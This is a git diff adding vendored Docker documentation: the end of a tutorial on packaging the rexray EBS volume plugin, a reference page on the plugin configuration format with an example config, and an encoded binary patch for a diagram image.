archive to a rootfs folder +$ ( mkdir -p $TMPDIR/rootfs; cd $TMPDIR/rootfs; tar xf ../rexray.tar ) +``` + +## 3. Add plugin configuration + +We have to put the following JSON to `$TMPDIR/config.json`: + +```json +{ + "Args": { + "Description": "", + "Name": "", + "Settable": null, + "Value": null + }, + "Description": "A proof-of-concept EBS plugin (using rexray) for Docker", + "Documentation": "https://github.com/tiborvass/rexray-plugin", + "Entrypoint": [ + "/usr/bin/rexray", "service", "start", "-f" + ], + "Env": [ + { + "Description": "", + "Name": "REXRAY_SERVICE", + "Settable": [ + "value" + ], + "Value": "ebs" + }, + { + "Description": "", + "Name": "EBS_ACCESSKEY", + "Settable": [ + "value" + ], + "Value": "" + }, + { + "Description": "", + "Name": "EBS_SECRETKEY", + "Settable": [ + "value" + ], + "Value": "" + } + ], + "Interface": { + "Socket": "rexray.sock", + "Types": [ + "docker.volumedriver/1.0" + ] + }, + "Linux": { + "AllowAllDevices": true, + "Capabilities": ["CAP_SYS_ADMIN"], + "Devices": null + }, + "Mounts": [ + { + "Source": "/dev", + "Destination": "/dev", + "Type": "bind", + "Options": ["rbind"] + } + ], + "Network": { + "Type": "host" + }, + "PropagatedMount": "/var/lib/libstorage/volumes", + "User": {}, + "WorkDir": "" +} +``` + +Please note a couple of points: +- `PropagatedMount` is needed so that the docker daemon can see mounts done by the +rexray plugin from within the container, otherwise the docker daemon is not able +to mount a docker volume. +- The rexray plugin needs dynamic access to host devices. For that reason, we +have to give it access to all devices under `/dev` and set `AllowAllDevices` to +true for proper access. +- The user of this simple plugin can change only 3 settings: `REXRAY_SERVICE`, +`EBS_ACCESSKEY` and `EBS_SECRETKEY`. This is because of the reduced scope of this +plugin. Ideally other rexray parameters could also be set. + +## 4. Create plugin + +`docker plugin create tiborvass/rexray-plugin "$TMPDIR"` will create the plugin. + +```sh +$ docker plugin ls +ID NAME DESCRIPTION ENABLED +2475a4bd0ca5 tiborvass/rexray-plugin:latest A rexray volume plugin for Docker false +``` + +## 5. Test plugin + +```sh +$ docker plugin set tiborvass/rexray-plugin EBS_ACCESSKEY=$AWS_ACCESSKEY EBS_SECRETKEY=$AWS_SECRETKEY` +$ docker plugin enable tiborvass/rexray-plugin +$ docker volume create -d tiborvass/rexray-plugin my-ebs-volume +$ docker volume ls +DRIVER VOLUME NAME +tiborvass/rexray-plugin:latest my-ebs-volume +$ docker run --rm -v my-ebs-volume:/volume busybox sh -c 'echo bye > /volume/hi' +$ docker run --rm -v my-ebs-volume:/volume busybox cat /volume/hi +bye +``` + +## 6. Push plugin + +First, ensure you are logged in with `docker login`. Then you can run: +`docker plugin push tiborvass/rexray-plugin` to push it like a regular docker +image to a registry, to make it available for others to install via +`docker plugin install tiborvass/rexray-plugin EBS_ACCESSKEY=$AWS_ACCESSKEY EBS_SECRETKEY=$AWS_SECRETKEY`. diff --git a/vendor/github.com/docker/docker/docs/extend/config.md b/vendor/github.com/docker/docker/docs/extend/config.md new file mode 100644 index 0000000000..096d2d0822 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/config.md @@ -0,0 +1,225 @@ +--- +title: "Plugin config" +description: "How develop and use a plugin with the managed plugin system" +keywords: "API, Usage, plugins, documentation, developer" +--- + + + + +# Plugin Config Version 1 of Plugin V2 + +This document outlines the format of the V0 plugin configuration. The plugin +config described herein was introduced in the Docker daemon in the [v1.12.0 +release](https://github.com/docker/docker/commit/f37117045c5398fd3dca8016ea8ca0cb47e7312b). + +Plugin configs describe the various constituents of a docker plugin. Plugin +configs can be serialized to JSON format with the following media types: + +Config Type | Media Type +------------- | ------------- +config | "application/vnd.docker.plugin.v1+json" + + +## *Config* Field Descriptions + +Config provides the base accessible fields for working with V0 plugin format + in the registry. + +- **`description`** *string* + + description of the plugin + +- **`documentation`** *string* + + link to the documentation about the plugin + +- **`interface`** *PluginInterface* + + interface implemented by the plugins, struct consisting of the following fields + + - **`types`** *string array* + + types indicate what interface(s) the plugin currently implements. + + currently supported: + + - **docker.volumedriver/1.0** + + - **docker.authz/1.0** + + - **`socket`** *string* + + socket is the name of the socket the engine should use to communicate with the plugins. + the socket will be created in `/run/docker/plugins`. + + +- **`entrypoint`** *string array* + + entrypoint of the plugin, see [`ENTRYPOINT`](../reference/builder.md#entrypoint) + +- **`workdir`** *string* + + workdir of the plugin, see [`WORKDIR`](../reference/builder.md#workdir) + +- **`network`** *PluginNetwork* + + network of the plugin, struct consisting of the following fields + + - **`type`** *string* + + network type. + + currently supported: + + - **bridge** + - **host** + - **none** + +- **`mounts`** *PluginMount array* + + mount of the plugin, struct consisting of the following fields, see [`MOUNTS`](https://github.com/opencontainers/runtime-spec/blob/master/config.md#mounts) + + - **`name`** *string* + + name of the mount. + + - **`description`** *string* + + description of the mount. + + - **`source`** *string* + + source of the mount. + + - **`destination`** *string* + + destination of the mount. + + - **`type`** *string* + + mount type. + + - **`options`** *string array* + + options of the mount. + +- **`propagatedMount`** *string* + + path to be mounted as rshared, so that mounts under that path are visible to docker. This is useful for volume plugins. + This path will be bind-mounted outisde of the plugin rootfs so it's contents + are preserved on upgrade. + +- **`env`** *PluginEnv array* + + env of the plugin, struct consisting of the following fields + + - **`name`** *string* + + name of the env. + + - **`description`** *string* + + description of the env. + + - **`value`** *string* + + value of the env. + +- **`args`** *PluginArgs* + + args of the plugin, struct consisting of the following fields + + - **`name`** *string* + + name of the args. + + - **`description`** *string* + + description of the args. + + - **`value`** *string array* + + values of the args. + +- **`linux`** *PluginLinux* + + - **`capabilities`** *string array* + + capabilities of the plugin (*Linux only*), see list [`here`](https://github.com/opencontainers/runc/blob/master/libcontainer/SPEC.md#security) + + - **`allowAllDevices`** *boolean* + + If `/dev` is bind mounted from the host, and allowAllDevices is set to true, the plugin will have `rwm` access to all devices on the host. + + - **`devices`** *PluginDevice array* + + device of the plugin, (*Linux only*), struct consisting of the following fields, see [`DEVICES`](https://github.com/opencontainers/runtime-spec/blob/master/config-linux.md#devices) + + - **`name`** *string* + + name of the device. + + - **`description`** *string* + + description of the device. + + - **`path`** *string* + + path of the device. + +## Example Config + +*Example showing the 'tiborvass/sample-volume-plugin' plugin config.* + +```json +{ + "Args": { + "Description": "", + "Name": "", + "Settable": null, + "Value": null + }, + "Description": "A sample volume plugin for Docker", + "Documentation": "https://docs.docker.com/engine/extend/plugins/", + "Entrypoint": [ + "/usr/bin/sample-volume-plugin", + "/data" + ], + "Env": [ + { + "Description": "", + "Name": "DEBUG", + "Settable": [ + "value" + ], + "Value": "0" + } + ], + "Interface": { + "Socket": "plugin.sock", + "Types": [ + "docker.volumedriver/1.0" + ] + }, + "Linux": { + "Capabilities": null, + "AllowAllDevices": false, + "Devices": null + }, + "Mounts": null, + "Network": { + "Type": "" + }, + "PropagatedMount": "/data", + "User": {}, + "Workdir": "" +} +``` diff --git a/vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png b/vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png new file mode 100644 index 0000000000000000000000000000000000000000..1a6a6d01d2048fcb975b7d2b025cdfabd4c4f5f3 GIT binary patch literal 45916 zcmd43bx@UE)He)x5RM?JfJle5lt_rQlp>N6($cM@(x9NyQUU^sbT>#NA)(SC4bm-w zNPg=w?&o>uo%!bb^P4&MJ;U}~wXeO`TEAH5*`3>RXU|Zc!N9;cs~|6?8mEj#}{hMznYINBu?&oe6G$A5M8Mr ztp2%?yOZk~NktGSO(E}t`um}Kj_Q>uvLRE#Vv_j#d5(dNzJ`Sk$N2q`=ttiPm#IZt z{P`34KQ{W{zd!!}_0JMA*zHq|{>*G_?Q1M*>9Dh#VM&LRcFg&rSx zqV8j@3jHsWhM6dpm8o)fUw9v_7<@n2sL#1iD7KdpOnpr=U%!@JyZC-ld^Fc=n`(Vf zM)_vzcntLu*&9zJ`cVqiE^F_shw^Vnd;OY=O}q7q&(Hq!q}M^-d*1oauSeN#GtfA# zk7;ij$t%$jUG;sZpjTY`IUxJC_u*EcN>L!KmzLE~zAaVT!R<_nr_a?GDsE&_@Fi0) zP6ZiKT(Jn3mgzU2sByQuS+|h%I9TZ5=Z4@6OjFa=YRMOo=jYgFK8Dl#&*oRJKRBG@ z_I8}AvEDoSIXO@!_2i5&pJ~T8x6MWzY6I`1vQ&e5FZPXG?Gj3b_pTduQ9oglMuoy& zCkj8zwnkoMpS!nhmFGdZ$xQRJ(B*-gYj@1vJ1tQaX2DAceSOW9(*3ISU{|5!cH?dv zt+%?PzS}hR?0d05y!T=k_|2RWuepBSI^6zp?fH3*`3A?ij%ezK^Ig0h-Pc%@lbn96 zj`T%{dwa>naB5Q#iXRr5w1rX=e8P0zWwDv48NsZ6LB_Q#pDb3(sGKAk`rdg(gp5-w zoc&h>qa4-vd*_GWI%B^?2tPE_xU{U2DtlIg`{84{qUgQ#VN{3O#X6@YRZ|m~C5;oz z&gl<<*Df2><)&uZ(j6Yn&FAaieo{^4_T0Wj_Aoi_AbG-jDJ?cpaXVJIGlomUYtLZ3 z(8xd4X{mSFTTob7doH8%1DPk$TFmvwE<2JshbOe6Zrwd;H_7GJ$Ev7d(LNOY{*f`% z`*=I~_U=>zZNAGodH(rc8>fqld3JaPHqKth<O{E%xZw@1v&Si_61$gmMUD=>Y9uD`AKSVZ);YO=~aOVtu2P{+n;3-nzPj= zq^!!r-LRq5JxbRW?`9|`52jQ4bsHROR#xT2suU(rD{t+Dw9#JN`J^&**M3L3o1ONk zTgD);yZhJ9VvqEIL@bVD@X41emc5x_p?8b#E6Dj`VXKRb5&m!w+Q%cmOmXgT&T7cZ zNWHl&&e>YFZ^qct{jSbU-k)lV* zTNPn%C^&YXL{>-d4t5*X^Y{~RrhF+$*>*De@*=JBezPuz6q>?|e%P3k1dY-sr|Py^FNW@{3|+gd_x@e} z!J}b1>N=H074qPY#Tp0x?nch=&9Fk3H65ID0(Di(d&jsWN6G;>XZP$z%RlkjjR`Rl z2ESk2{L!a;alv{ZdrqswEQGy8JxjIK{o!M+kd08K6j68qcEbTZ5%ouF_MvQQ=|Wb6 zxt59cJ#U}n$J5In&e=ansD5+-yLx2noWZ2qVUgodzFz3hN$<(b6*cASb9>)AxzE0_ ziw^U$cx$tX>V&N)a=aDhok?jyQ#tWYfs{G!OQP^><-vOO*^6h$FRu>QKCYN;4Y^2g zNK1cN3^p(y>!OFpj$HLFUMfR6wSn#Qi@bsIUVMLBJhk(|dIn>kJkO<;zhqI?Wc*4& zJhWzeT)+L3#)e|btZms-c6)1}?M~GB1E;#i2Nho@%;t|puZ_{+cV=axNydA|Y*z+y z78*j()BRa$trh76)FMKX-Gq*~q(>oWhX|JDhKbt8A$#>ly9x1pjRM=Jx;t>6o!2Fx z5;8pGf7565aesejr6Xyh{$v8P(U@SiElhC6`+Gaf{7nLHnyW<4B4bq#km9;|J0cNy}-r55^xow;zzj zB^tk6P=EYhjaTzm9BuqY?aw4NeIcI7;7>IWvyRQ6T#jTPRI$fAio%&1dy5V6QJO8T~s7rs(4oNw&7KK${cDNFc4aJ^?&w&$A} zyRzC(u>4)C=$OU%YA)UgN&aZl6f&wI>PDEp@kOIUS;FE6x^? z-S~TE@uMFv@6~x|6VQleex4pjn|8)%9PFvRce0GGcVzIP<|v9pD1^HXtjq1S1ybu8n#%bC+FPfSngyMl&03W^N?PvBi+_( z5*&97vHIivoQ^cO&)c5N(ogZfckzFrU^Z09wcc!@-GaCu@0uBURMexU-S{0-&HjyQ znqsTz_G8Pgs|z0^J_My62;2^MXq&M>p(Y1UV|1#mYa@@C+>{(TpmwMCq z*VVL^o*2&2thSTo{AB(%Yfp>US|?G3GddBmn40vpX~&~qbEGRlP`R-8G&d&9L4wXY zo=TDXwwWbtI-?AIzaUaK;g=cYSEh}ucNJZKPN24>hglm+{pZ@|Q)qMd6VK~9Y&Txh zxFdM9@ z&)XYnrlw-9@T%2^Jh$YqysOeWL}geGVU|=Hzw^FO8RDbcbMkHx822u;FTZf2CbH-i zGVAc*Z25%Qfl*F=#)y|*hC~HSRFUv-Ic_O|2z6cQEC2bl`Y4?$oP=%O4V(u^+{Lys z;2HC`w0C$WLo2ZTvz&H-n55=)nWX<|D|IH5*5HoYH9rlz;&`8a8YwXs+}%pQd&pRQ zAbPwv8_92ed#6>LN$BBxaK!BmNLw-+l)BqW1cYkTc9V5^6ZI)!MPccZ+oEC{LKW79oZM>U8E(-R)DA}A5 zIV7#!Y{DysP}?Z|9s(#k-jRgl<3)$#L-$&18|7p%+f|b`E02t3Nt!rp&N|7e(+?*d zS@J!$Dw;l(t=^$NDDKe}Zv5V!C|uIET04?<5Sh_DJx^&>h1L zIK8w?y%dESx5y$JrRU*tPJv>**U>kBLa{q)bVNdrhM~;VGxiEHj57X`bX_E?XaEb7 zrHgQm*88w0j=eV`Z`iN+((Oc6H?Hq3FUYaWy|!A&t-ikVI@)KyDf({b!7`rYaalX3Equj=e#2 zyz3Re>5s*p@5culoxvCQQO2n0c9vvy-EUjNCSmPwZ@jp_|6^%6dUe^alQ!6R(TBXG zanhva`S}hxspKJD2x4WU6xZWK-HX4AOVmNFs_xuP=!CCq6=6sw3z6|nFs-=$?#5)n z3xaksMm}7_zDh?ENnuEQC0A_kC$+UDFztMr8+V;Ne|^S?j3%yFssUFqS6^ zTLv&bd8wSDQPeSDcf`>B=s?lDqWnxib+rg=vg(@!U$m>fXf2t%DOMg`+8DH3TPqmP zntAd`Z&0bVZbBMM*{tT{t;fA4ujrZ}y=3cuOZ$>gq1EE6!69<5_R+waj!O*==1ts) z!J3Zw;UW_P&N;q?XP%rlTkv`c?Y(&8&+DEhq)B8qcqpuem3wO0uEjwPC_vi)r*fh42NZj=S&#j7%PinPJBl)_@ zTY1AlqP2Oeg&l1*Bq(kUr?ZcqVCsLqPoOoP`YPkyJBrxCbNb0`FP4dNAC&3V^RO?N zwdv~a8C#d-N%fG~Wg8}bZyg_#+o^u#B<1>(m*c15>#&u<4$oFA+7e@f%t~Ebd;W(8 zKQG^PnHDYogo}WRypKNR|HTv+B{qp?mqo3<}UUF>%+W3}v!+a0E z$^ZKHQn}wkCW7Hcl=MX^MWZhZ$=>-k{ktgy_O&}Pl)S$7vQN&OZ_e#E=-heL(}b=HqOsc@BV32x_V&wbFhQ`mPk z(E}?lLnGg1h1_>=^sY#CnFih1^?@EJAk=68m1rJlv9504ugKVTv9?!s*%wJhmCbUf z*4%5`c+lXD^&xOxgJnxq++b%9iqdGhhC<`^NapCmKFdNBxfhdwRXe?IUm8Lm{%u_bi0U2D8)xEB_HOGbkY`631^n91a87 z8ok*X92KA66`tuMj-!0&X{7yw)2#guL-S0kK~s$B8P;{3oo2j+!2$zrH*-7>olOS* zy&S{+(_(^?-Y3^vC=cmOpwG3 zQ3{p&Z33Z!>!3O7P!{k_2L4E6kJ%SS$X$XgRZlr15C_8>7F(Q@9Wu zL6VWDt@ih#gq0_iVr? zg7^pCZpg5WWZ(yS^2_&v(6b{$#&2KQSl{Q|aUPYzFEaW;kLJB&Cijm}GkgtG5kR^Sh!qLnC{QPZ2t{N-GUd=Eb)r^9}DN>495(<;>G?qAQ1$#TmS`Y z3FF^aMpAg&$FEt0KmGR$M5Yjz7xPRc(J51x|Cqf&I7Z97_1u30^p_+gNsLpvLjTc$ z4I-FlNLISy{QeElHN#tx!jBsH`=T+>S}gG1USClAyUsDt0deqVgM9g}{e5qAm@6n7 zHu<`fZ*Et8!H3A_dzTLp0 zXX!4rR2x{JdAwQ_KDV}>)B~GGkCkLYsn~!tMUxzU zID~`?)S3%Iz0%L7>-U<3~m&gnk-Nb>Afk*2&C{j z+PTZDD!#wSs9kCifmD7m-|yci*_6RBuz+1$P)Fo>{A=OCw~xfBC+>=~D;})t7l5`* z9(p`EWZ=yuXg3xPsb1uj$?-|!lhF$MPADYjXixS6_g6xXYYNGFy{GlT+s(Xa^FYHlhMcRn}pjL;ztUac{38b`5xJzDXF`2!QRwD2UHjU!02xKa=l!|beOYEu z;l(P8AE_%%-bxl5pA}aIj`ZD~H&T8^o=^8K`KS~(`r~xMZvEB~&9R(LIVoVa#&E+B zYX8V-AWmG{w5TevdW&vSNzX3oh;G`6^R08&FJM4T2==C%0EKXbOXxBE?NQonauV^O$xeayQs;++Y`Fi{4g(R_qA@UzcjR*bqcc_)IUZh+>ROBY*q zy=N~QF`*xWk5`HH&}Ga1%!sKIT3d&y2FwaV8|7m%irNpJn3lwcRpy4MG}n!Z?2QJw zq|i&y7iLz4uNk zKYMLPiqX9%K#+Fie=W0Kv6y*OU}hlL&9oY7i+biY^@00?t`8|=^9`sIYHsl7Pq$)7 zV$%C39OH4He-b=(V27l|5_2yK4>Q%hlsT9CZ8Wu(6LCXhyTEffbo{e+HbiZ;c6Kn!ckPb`v6 z?b0hD$G1>JOY{5)5mT-A@)UO4Oo@LaWAI^9$U}GYta_kyAb|qRxas$A?W)=8Y)hjR z1wejDrYj{}0tTsm>Zu*U@ehTE9_u)A7^#f7)Yn|pbwyW+d0L1pHW!jGRjMD%Df;qr zc`S6_-Qqdf9ksts_QI0+)?MTG*nXPcD&ON8K0O()cFifd@q*0x;lNk6A9{!O9*0|P zR#6vsTGiPT9rZTK)*qM|xXLm6eip{UXP|h8tM@TkT>Pmh6@-JrsHM~}vFu*G+D95` z)}!TlB4S>Ll_Klo)fFOM5CC3(*DEr9A~Kn!#xm;x#P2{=M$)4Wp}^P37J9t_kK^bC z1oHA2;OLNtZ@!`hM(>QwDT^`6g*xHWhz=)bdbI${9XuoIb?8>G_4vo)o0+_ORjMu4 zW0ggWKp1WT0uW9EO19{^x!vrY9}x(%KQ~%vB;5wwc`#qH_p!UP7jOivRr8+`avmal zk0Ze~&}CE>Xdf-o&(=hXSu&k5X6aue4`35}`Sin}ZiSujne*)5J||*1!Y8am(GCtP6p(s z>}^8PO&_r}huXW=1oJ0KGA^zs0(@v=7OEo_+=p@f(+$#3IQw$2?cv!axE;8SY$?PH876@*NJN5K7F;DadLuIT-8jTRVqJ85cKL~!M6tEJy z5Zpt8y7h_<^;M3C-IxFoBSf0r@ds8MfI-UC3y!BV)bfDUw>-+2Zqqdl!CQmz`b9xI zbv4wy_3BGA%IQ&{zchyp&z)s7#NE_DD$8Y#M?aXT$PAvtrG!11!xxR^i>5q1;?2*`qS_B0Z52 ziQ?2&-N??XQ<$1=frpO0toOhw2XbWg?8Al6?Xc|LH8V}z^-G(@rC655)u8n)z{E-{ z_=L%D5tGB0Xet5Ygyq&+C7#1i_ zE%Z190HY^tiuWess_j>GgE*q4&FK$M;~HWw4;@cO^?29cdR2dC`h`KA$1l_g3sGy_ zXZ)*%a~F>by1W=flsQ$qPw@5=GxDtUhKH_4Jg?s_CuVZU^`nEF8fKVRo8e>6O`+77 zSY3cIiGkYlsR1UNCRKVQ!9T;BN;$N2zH}^%0JHYn-N~-0jIG|A+*z)Ji*qBJ^u2^0 z<1xOw#L90+hH#T<8n;T%NFB&F(za3!vwXVJR6?jy?eXhDwD6(O7}x68u?(Y1*U6=Mo+~~*b7w_W|O1lEpwC6ek*li+0V@pI!Vptc6@7?XQcw8#f8bmLBA8oi# z#+bc#l`z9($cOu;gKDcf9hD&Qj~|INj(wK*u+zk7pL0!wUYJi+SkIA+K7TWikoNLM&35Q_vNnge)(uKj8>bq?aR)yioT0#K z5!A$`zV)fHZv1?X$z~qz@oBBMmduOZsvMRSf}$uM@sOn}xjYgVO*&2)qr9Xj%mi_Q zW9S#{Ur(c#$ z&R4JnkB^TIIzeze^m-OvC3^kJ#?q*d@a3N$q%jy!f(yJRt*pss4p%Y!Tx4Yo_;5Jc zJX#Y(F8=cZ%thbrXRE~*O!RENS3VKg-D;oO5Q_?ZI?wZX*Jg*({)hKngL4l>*8`I< z5i2V7=&Nk7qR9^hDO_2fwRYbK?a6X8AH?0mWa@6GZNBN>Whzo%vz;8*=nP&8}XQ$w6!Siw;ZP<`+ z*gE&&ty{?yC}tZu`mN3$qm7%FYI+21hEwdWQk1ue<41`n_GA5;$Eqfp;;c6NM7bk& z#w$mlFwg^s(EfUTSOj*k&9p9gVhX*)rcZ+vJL<x!Un#tu4m5t{jkG=h0UOt6(V=zo0CZPzLcJa8`e2Qjb(rs8m#xUU2q|WAJ z60PO=_BY*n%y?v+nO@{LsoX>iZiSMK6&5{GXV9UNQ?DBP`ifhyr5f+I)3We%3n)92{igaPb0467W&o`dy%5KLz}{`G!>m+ zpm!o}8jvf!p07LhuKr;CS|gu9|0z!r-CP%+J8XCJ6Rk;T0$*XE(0=--SF(hTT=Z*l z@jY?Xyol)Bo?v)=$GZ8RS0m^kCTY3b9sBW@ZZCGCp?&YhKC%Lt}pFRpOwu z-51QdCIu`gGhWSVqpvrWm6z@n`jMo{QW%|SAw0kA;XhJ*f|BMIwX_wGB1vNByZaj# z`pOeEuoCIFW7HEr^hqX{`tbDZr;I9PtlKD?Iq8}E7YP4=U*qQ(6UEPm_zZh6C&K(9 zNcN%((-@nBex1$d)!?PPNDMHTxUowL`7+%x+K^J_feg?m>RIsRexA|=4%<)dMPFaOdV_kiwr_QLEw^IynLR}Rp++2x?;(Z6%z!8sj! zf^$)S5qtAhK;y%9;yTKIc>qUAIOpZ~i0Hq7-FFxP;KM)?VI9t&wg{N(Gk-(8kY<6a3h)*2o6iSf3DLCE9s=5EDa3?tW2WD7!bMGnA_!VHxc@M(F zqCcaqZ4rhl*PPyEJ}9-R`B`SDP*QOEX801Ll8+cu#HG*Q|06n7iGenH62S7`00T19 zz0KM*{}CPRFp*i|oB!r9T;d&KNQxKg{EzvNzX8XbCrSE``3SlKb1hG5?*1Rqkp)xv zPO6FYzkvv3vMpyg!~P>W&ciY4@^1gbeDuO>Gbkm_{l|Q~V~~)HJcCvq4rxfc8T$>; zl?(ri-9J1?KsYQJT%-LC07UnS0RyV{Y;rV%xOZnkx6F!JK|#Sz94f9<}b z_L_fA)Q)`l(iCdEtd7tpq;2DMI~Wpi#0gGdy-iH=_mZ z_1QFY^KqR+;*b+bq zK*rMPw_j(^0KF;yVBs^@TxV=7zygY`p*&p{jcoM@QTOlizy8q{<8Gs!Euh*q z48W${3r`u-E-^#PYKvmuA~t$=AHYr|z4Yk|eD{OiDJSb^Yv!?o6D!)XFTEY8pm*R< z@;fBv5m5zNN?Dt70sI?tyvoC_-@hpcoB<$DgWxTRcQTAltHUa+if<*8OyNZ`iTFA_ zBcSWu;Z}VY1aw+Y)-cduBGiF1hTvPWT0W)5`f)OWsAujxxBk5~8d0}9q14wdIW!GS z@2-tnEuZdV0fae_F;I@!UE1bP-D;zA>nzc)eZ=Rweox@}_Wnu%hwkK~6)q5fUkK*} zt#TXG-P0+xpx2SO@$L?p)bD^rM@9dv?>2^aaItCUnPxw6V-y9QJ`tS|yGAw>u(5(- zaUG59)VV)?{j5J(lR4WbglpM*m~jpKJAIY;)T*^}Xcqn9_{hk&>AoPgaDu^!KW5*m zI{4OyniA7aGG;{~RT8uAuHPZ}7VNxRJe3EuSQPXPR*7iROSsM0C>#&P)-c+FL%Gk1 z!l|>`nVaOBx&{PNnqi}#D)_Fl4C?C; ztun94*Sif?adZjWp(@x+vQ(vHU_x*3=mltqSr6u_j*uktt zOe&1#`aAEFV?MC6I8!|nKgS%A(#3~FyD4u}B-NwH6Yqr?JNy1jl?T8dT@Ze7e{A3r z!TF|aD$a!gZr2ijCEu@8BG&^{D23Lnl1X;cB-;7(-k}Q%WFY|J#bC(E`!Rp~;i%-p z$m}>?lS_pT_X&YeH=N09@%%bE?gm=(BJbY-l_b%`d2qB|y@ARRq>xfhfhq_~ZpdvO zPo>y#R(8iL$}Qh~@iETB->d!vmnoP|A@=g?M`z!AYf-#FsggSEa4S&zoBxT_Sj^!( zeyGWrt;cNmOj98~89jt+W6xtN_3AuEbjfP|2n$3QnET-Jbt+w+yV8XEzTADo=e?th9G2+s|^GX1gdW8$?xColpkpTwm(f*a%J-OeaB#)8`2 zcuw8&TM$0XD2hPz7GQ8(`zkPd4`jdlz`6CND_s=!+%I)n?pHAToM?G3`KoPv6uX8Z z#Dq(bI${yx)VkVrBL-L(1>jxNJbr!WGik+lreWl$dN3E+lPY%;?jy~j=dG*=I4_vK zR@ieRu297n#IM01+YYo()MY&#voA@u!$n|mj5Ywbs`@d|iNyUM?j{*{?nL+J>E3-X z-^B)Q%a_kcS)PBGCbD;-eDWah&-!72iDmE;E`D+g*hx^q8C}PnV-f!%B9E&sUS@7S;{MS#8`;%pi)&EidcuO z50||#Qs-H{I##7tw>N_)Nu_K`_o?dP!aE4?y>Fy(%IXapv6hAkk`FgO5GsmF_(*)C zn}FE_nd1hSeO3j&K$2v;mh3izHYJ>4B;=|T9m!hx%=KqY+=o>z^Yme}Vx#{fNJUmr zr=HCC9s~2584(~6LcwbsV5t5UOg&cbrV%&Hgqg_wk3~KYtAhko@H*SBf@~z;KR3^A_D=xy^`i zf5PwOWXOWGw0a-k7M+A4D>oIO1J-Ls{#!2$OQ)gozWVuIa#vXTu1F(W7Iq9;E6Tj{T*mWVjC-@Ufm{ET$D(Xvh}Pe;HR_u@3Ue?$nlCO_8x zoXA;T>f8lSUG~zYhe>f>O&^~TXs)e-)D%o5tjbbxM7D-CT@Ju=>1$ce73;xUz;C6< zB(H^J_`dNj? zagBGIsSGoO^M2`wu1n+laRu}P`Ng!!xI9_!Evgyq%z#M}WCZmc@0eSD`s|w!%V2~c z#UY}R+B0OwCVUIEkpjT>=!eU|9Q0rLeE4fSIxO%r9wS|xj&J1_86@X7bW;v)YhoH0FX%P(u4lmK+rdp-Qj<-a&HTXY-CI1*IiJb(GiT(Q@0Dz$3bS zDgkCATZ}^3@Aam+`@(D2cfh@htp&H?I*>i3{RAZ?7dJXgjwY8Ba*8LCQ!=>x%2ABC zo1{RcFgI9H1OYk5j1nm;V=3MZSBS9+a{J(SQn61aQ zg0iXMJ`SOx(5I$ycnPW@&k;vl(xYWIjnkSFh;C)okE*+*wd6m=rW_nVr;N*e>l31y zeII-HB`a(sUFK_>6=QI`l%s#R1Jv_h2?PJn<1eZ`QPk3?lda#$BGmgujqKkuxW$ye(fBSx*=xX6z56JGRdS-_>u%$UcO`uDDKaGXbD6|u`+zE?@- zW=ZDd5b^t7SEXRx|30r8%2*>9338xE(IMRiPzki0dq@dsnP?Ioa;Dl-yPAin!Fs4D z{!$E;mJz?#N+z(a(2*d#bIRXH;sYm=`{)d@5{uCk)TEc#F}>48KtH$f$H}n-e?9{e zIqM@66BBJNj#}U%lWGAE6_2W5nqu*V?cMo(uCq2YoT_4^mPzh{M^o!bnXb zd?Zt3o{=EI7|azf97F%+szyMH=ulcU7FNt#-glyyEM`l-!h9LgLkc6y?YcsY3xiS| zC801Ffz%dky__tU(RZSnO-qVZVNit*2C)}8`Rd@C&37LcUxmRQc;CyzebLWQJY$D|gyL%KwmnJlavmQJWt)S{{JSfBxf3%W?2W2;#*qM1bDh5|OQP(<7)s4LijB-R8w**>n9vlgxW zXt@#qRVt(=c=zE0mESwS$w;!IW;QD~|B@7PLD!NMFcO?XW&<*tA#R{n7D)=dIR zr9dRuqi_EDK4;n*d_nfmd1X)mJkU(gs?nRP&A-(B#vkdE2`7|wy%S16anvY)idws@ z45pC(FJM<$*Z!&-M_YpD`kotm@`3_g4{#bxj|dHqOrA;rZXJj^ldkc@93*6;GFmJn zplGs1anY`rsYD=9#2y{|#FLQ$H{QS^zK0;srz^nt3(P%)CJCh137=X-9rhRtQjY=S zP}$kLGzP5q^?9_fzbKv7?L;B^ftH0TOXtV#=; zi4hsTIfGa*G&H*cQ8ow!Ci^78DBmE68B8`cTK~&`De6ujz)L(?txaD-bjND}>lnkR z7PW?R#IlOzcH`^-fx+APR31vOG^>H^-U@qzS5Pe?t_gPaOuCP>n1l-=&dY8cy+ZX? z1MFe$O?600SBV2V>&G}=6VwcSe$4$bKv{KV!8L*QJZeZ z%-b&}q$E);+Q5o!2pR;aKW??0yuZj2~{ z=k@2e%={}J)Qq_P`fjRGGe29vb=)fbnoaRAt;NlSrGf2Ybp_EHqb~(R_uCtIWt8Sk z0cb2o%tp-Q$gSBnj*|%R8f5kaLt<}-h-(UkY_N0c;z=JWwU2bAehQBihcqKlxN{ngWfFr)Q-rM^E)Dt4D z*L0`8Enjvk`MoM0-n}jKStTmKpM5*{iZ4@O5>tp%J2B_~M$)L8rYc+VKAvo)dCxV3 zwLa$t18N5>-8t~sDthv^ey&V7-Sjbhm(9o^r08^7RTD9Z3l<5TZvZ`p zcuc-tb*rtXuqsJ~QUcNWR62zqGc#rg#}XLa?jO`uMRB+kH}xrCAuuBgpC_&t0FqE-LNHq7`@2h~{*UApL6>4cO8cx>>ohtb0jiuz zG`}~J=5SB>Mn#>Qwuj)arQbMl6HI>&;ioHZjVQFregR^c~IHvSq#vE zggAfb<7|u>xa8!)LubMC`q=?HZE4UqkZs7zOvz=p73Hb8% zAM_^mg`NRL#M&??L&SWJDd`c`mwya>6j~yRQ>Rp3n|R}GfFD!G>yVbe|KuZxwMnah zQjwCJ$s^yS{F^w3eIyuyNY0R4bh;A%FD=&LHdnJw7aJH{_Zj+oO}aBE!~la-(GXRx zMeCQ_XlsMb0_h~7 z{tUWf0C)oh=u|$W!ItC-lGwnbfY%&K@UZ|oa;(~||0dsM60c`&-6@i)l@3PjV7-EL zcgJOQczQej^IiM#k>#vg@3g^127L`Tz^cOt{K89UmHG$)U*k2e4(hZBQkv*}D9RA6 z9Z3COtaDeQu$uYBpSouvEA5Rn!;zyEUS&tpz57eZI zPT!2-R3Y34kE1-|Dgw7$wvGMJ7%|W28DdP`@o4w|mA?(Gp*D#=yZ-%3GF~YSlBJDT z{$}a;lHe6jxMe$i&EKv~shcS<(~(@dS9c%}%c9Lb#WRDqn(xeVUq%=u+eoEjD&oLI 